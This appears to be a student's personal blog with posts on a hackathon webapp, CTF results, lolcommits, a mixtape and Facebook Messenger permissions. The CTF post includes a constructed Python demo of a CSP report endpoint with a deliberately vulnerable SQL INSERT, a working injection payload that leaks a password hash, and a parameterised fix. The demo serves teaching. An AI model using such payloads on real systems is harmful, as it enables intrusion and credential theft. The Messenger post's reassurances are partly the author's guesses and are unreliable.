CSESoc Hackathon

A couple of weeks back, the society I am a member of at Uni hosted a hackathon event, sponsored by Freelancer. For the uninitiated, a hackathon is an event where programmers literally turn pizza and drink into applications/code. (But in all seriousness, it's an event where programmers develop a cool idea in a small timeframe and compete to build the 'best' product.)

I formed a team with two friends from Uni. We set out to build a web platform where UNSW students could list projects they have worked on in an easy-to-use web directory, which they could then use for employment and their own portfolio.

The webapp is written in Python/Flask, uses MySQL as the backend (because Mongo hates many-to-many relationships), and uses Bootstrap to style the frontend, which is served statically from the server.

We wanted the following features from the service:

  • A project has:
    • Web URL
    • Download URL
    • Marketing URL
    • Markdown formatted description
    • Ability to upload screenshots of the project
    • A project can have multiple contributors
  • Project Page:
    • Showcase of all projects the user has worked on
    • About me for the user
    • Show who the user follows
    • Show who is following the user
  • Home Page/General:
    • A-Z listing of all projects
    • Show latest 3 projects on the home page “ShowCase”
  • Logins use UNSW’s LDAP service, so it’s all UNSW SSO.

There are some additional features we wish to work into it, such as reading README.md from GitHub projects.

There are still a few bugs hanging around, along with some unimplemented features, such as multiple contributors for a project. We'll eventually get around to these and finally launch it!

We plan to put it up at http://showc.se/, a domain I purchased for the project. It's a nice play on words: it is also a valid regular expression that matches "ShowCase", and it's a play on CSE, Computer Science and Engineering.

It's probably important to note that we came first in the Hackathon, with each team member winning a UE Boom portable Bluetooth speaker thanks to Freelancer!

Stick around for more; I'll update this post when it's live!

CTF Season

It’s currently CTF season, and as a member of UNSW’s security society, that means I get to play!

We began the season with CSAW CTF, where we (team K17) placed 1st in Australia/10th overall.

I did not participate in this CTF as much as I would have liked to, since I was already preoccupied with the CSESoc Hackathon. However, I did lend a hand with Web 500, a fake dating website where the aim was to recover Donald Trump's TOTP key as well as his password. I managed to solve half of the challenge by finding an SQL-injectable endpoint in a CSP reporting endpoint, where I dumped a password hash and other info about the account. We recovered the password from the hash using a dictionary attack. However, the full solution required dumping the source code to determine how the TOTP key was generated, which another member of the team did, and thus solved the challenge.
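A CSP report-uri endpoint is an easy place for this bug to hide: the browser POSTs JSON describing a policy violation, but anyone can POST arbitrary JSON to it, and the document-uri and blocked-uri fields often go straight into a logging table. The block below is an added, constructed illustration of that bug class beside its parameterised fix; it is not the CSAW challenge's code, and the users table, the stored hash and the report payload are invented for the demo. SQLite stands in for a MySQL backend.

```python
"""A CSP violation-report endpoint that concatenates report fields into SQL,
beside the parameterised fix.

Added, constructed illustration of the bug class, not the CSAW challenge's
code. The users table, the stored hash (sha256 of a made-up password) and
the forged report are all invented for the demo; SQLite stands in for MySQL.
"""
import hashlib
import json
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, password_hash TEXT);
        CREATE TABLE csp_reports (document_uri TEXT, blocked_uri TEXT);
    """)
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("trump", hashlib.sha256(b"hunter2").hexdigest()))
    return db


def store_report(db: sqlite3.Connection, body: str, safe: bool) -> None:
    """Handle a POST from the browser's report-uri directive.

    Browsers send {"csp-report": {"document-uri": ..., "blocked-uri": ...}}.
    Both fields are attacker-controlled: anyone can POST arbitrary JSON here.
    """
    report = json.loads(body)["csp-report"]
    doc = report.get("document-uri", "")
    blocked = report.get("blocked-uri", "")
    if safe:
        # Parameterised query: the payload is stored as an opaque string.
        db.execute("INSERT INTO csp_reports (document_uri, blocked_uri) "
                   "VALUES (?, ?)", (doc, blocked))
    else:
        # DELIBERATELY VULNERABLE: report fields are pasted into the SQL text.
        db.execute("INSERT INTO csp_reports (document_uri, blocked_uri) "
                   "VALUES ('%s', '%s')" % (doc, blocked))


def dump_reports(db: sqlite3.Connection) -> List[Tuple[str, str]]:
    """What an admin (or the attacker, via a reports page) later reads back."""
    return list(db.execute(
        "SELECT document_uri, blocked_uri FROM csp_reports ORDER BY rowid"))


# Closes the VALUES row early, appends a second row built from subqueries on
# the users table, and comments out the rest of the statement.
PAYLOAD = ("x'), ((SELECT name FROM users LIMIT 1), "
           "(SELECT password_hash FROM users LIMIT 1)) -- ")


def attacker_report() -> str:
    """A forged CSP report carrying the injection in blocked-uri."""
    return json.dumps({"csp-report": {
        "document-uri": "https://dating.example/profile",
        "blocked-uri": PAYLOAD,
        "violated-directive": "script-src 'self'",
    }})


def run(safe: bool) -> List[Tuple[str, str]]:
    """Submit the forged report against a fresh database and dump the table."""
    db = make_db()
    store_report(db, attacker_report(), safe=safe)
    return dump_reports(db)


if __name__ == "__main__":
    for row in run(safe=False):
        print("vulnerable:", row)   # second row is ('trump', <hash>)
    for row in run(safe=True):
        print("fixed:     ", row)   # payload stored verbatim, nothing leaks
```

The vulnerable path never needs stacked statements: a single INSERT with a second VALUES row built from subqueries is enough to copy rows out of another table into one the attacker can read, which is why "it's only an INSERT into a log table" is no reason to skip parameterisation.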

The following weekend, Trend Micro CTF was running, which K17 also played in. We ended up coming in at 1st place globally out of 359 teams, a fantastic effort. Once again, I only participated lightly in this CTF. I worked on an Android APK reversing challenge, which I solved over the course of 2 hours. I will post a write-up of this challenge soon!

Additionally, I was selected to play in CySCA (Australia's Cyber Security Challenge) on UNSW3. UNSW entered 5 teams. My team (of 4) placed 3rd overall in the competition, and the entire UNSW effort was also amazing:

  • 1st: UNSW1
  • 2nd: UNSW2
  • 3rd: UNSW3
  • 4th: UNSW4
  • 29th: UNSW5

I'll be posting my write-ups over the next few weeks, explaining my solutions to the problems that I solved in these CTFs!


It's been a while since I last wrote a blog post; I've been busy working, writing code, and doing general work for university.

I've been scheduled to give a talk for UNSW's CSESoc about git, which has given me great motivation to go and find cool and awesome things to do with git. I found Lolcommits! In the left-hand menu of this page (desktop only), you can see my latest commit message (and, hopefully, a funny photo) for the projects I have enabled lolcommits on.

The idea stemmed from me joking about how funny it would be if it automatically uploaded the image to my blog, but it slowly evolved into actually becoming a thing.

All that's left to do now is for the latest image to be uploaded automatically after it is created!

September 2014 Mixtape

A musical adventure through progressive house, deep house, dance and indie dance.

Download Here (Right click, save link/target as)

Why the Media Sucks (Facebook Messenger Isn’t Bad)

If you haven't heard about the latest news and debate surrounding Facebook's Messenger app, I would honestly be surprised. In brief, many news agencies are giving Facebook Messenger a really, really bad rap, and in my opinion it's extremely unfair.

Some of the claims news agencies are making:

  • It requires access to your front and back cameras, which means it's spying on us.
  • It requires access to your text messages and phone calls, so they must be seeing who we talk to.
  • It requires access to your contacts and is collecting all of their info.

These claims are indeed partially true (the required permissions, at least).

Sandboxing on iOS

I'm an iOS developer, and have been for many years. On the iOS platform, apps are contained within their own sandbox and cannot communicate with other apps (except apps owned by the same organisation, and even that is limited). More importantly, when an app requires special permissions, such as camera access or contacts access, it must show a dialog to the user. This is the flow of iOS.

Facebook does in fact require access to your front and back cameras. This isn't to spy on you; it's to take photos for you to send to your friends via Messenger. The Facebook app cannot invoke the camera without the app being in the foreground (due to the nature of the sandbox and lockdownd/fairplayd; I'm pretty sure they're the two daemons that control this).

Facebook also requires access to your contacts. It uses this info to match them to your friends for contact synchronisation, so you can get their profile pictures on your phone. Additionally, this lets you message non-Facebook friends (something new Facebook is trying to make catch on, like iMessage did on iOS).

However, Facebook CANNOT under any circumstances access your phone calls or SMS messages on iOS. The iOS sandbox disallows this completely; there are no APIs for this at all.


You're probably a little less safe on Android: Facebook requires the same permissions, but also gets access to your text messages. Nothing to worry about though; Facebook doesn't read your messages. It only checks your messages for a confirmation message it sends to confirm your phone number. There seriously is nothing here to be worried about.

The other two permissions, camera access and contacts, are also used for the reasons above; however, I am not 100% sure about the Android sandbox and cannot confirm whether or not they can run the camera in the background (highly unlikely they would anyway; why the hell would they want to spy on you?).

Wrapping Up

Long story short, some of these claims are absolutely ridiculous. More importantly, the permissions Messenger requires were already part of the permissions the original Facebook app required anyway, so it's a rather ridiculous argument for people to be having.